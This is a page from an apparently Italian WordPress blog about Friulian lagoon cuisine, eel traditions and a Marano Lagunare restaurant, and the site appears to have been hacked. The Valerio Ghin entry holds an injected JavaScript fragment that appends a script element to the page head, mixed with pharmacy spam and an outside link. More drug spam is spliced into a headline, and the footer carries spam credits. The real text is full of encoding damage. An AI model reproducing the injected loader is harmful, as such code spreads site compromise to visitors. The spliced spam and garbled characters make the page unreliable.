La cultura si mangia!

B Nell’ ambito del convegno La cultura si mangia! Il cibo come patrimonio culturale. In pescaria vecia si è tenuto il convegno: Oggi parliamo di pesce. Le novità legate al Bisato in speo: Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

RIVIERA FRIULANA: CONFERMA DEL MATRIMONIO TRA IL PESCE DI PREGIO CRUDO E NON SOLO, E I VINI RIVIERASCHI

Ancora azzeccato il connubio rivierasco, a Marano Lagunare (UD), tra i cibi a base di pesce adriatico, e i vini della Riviera Friulana. Attori, gli animatori della Compagnia del bisato, confraternita che Entra »

Daily Archives: 16 settembre 2012

RIVIERA FRIULANA: IL RISTORANTE ‘AI TRE CANAI’ DI MARANO LAGUNARE (UD), ADERISCE ALLA RIVIERA FRIULANA

Ai?? A Marano Lagunare (UD), la cittAi?? friulana della pesca, di parlata veneta, da tempi lontani la tradizione della cucina locale si fonde con quella adriatica e veneta. Al Ristorante ‘Ai tre canai’ lo chef ai??i?? titolare maranese, Giorgio Dal Forno, da oltre una decina d’anni propone piatti che consentono di ripercorrere la storia della localitAi??. Lo fa attraverso i sapori e le pietanze che mutuano i cibi della memoria con le contaminazioni d’una cucina moderna. Riscoprendo abitudini di cucina e ingredienti che spesso recupera dai ricordi di casa, e della pesca. E che ricerca nell’ambiente naturale lagunare: alghe sapide e minerali, piante di barena che ricordano il gusto di vegetali tipici della terraferma, come la senape e il cren. Dal Forno, coadiuvato in sala dalla moglie, Claudia Zorzin, A? impegnato infatti da sempre nella messa in rete dei sapori, ed A? tra i fondatori della confraternita locale Compagnia del bisato, ideata dall’indimenticato promotore maranese, Valerio Ghin, e ora nell’Associazione culturale no profit, La Riviera Friulana. E’ altresAi?? impegnato a fondo, Dal Forno, nel recupero delle tradizioni. A ragion veduta, perchAi?? riprende i racconti che gli fece il nonno Basilio Dal Forno, pescatore degli inizi del ‘900.

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo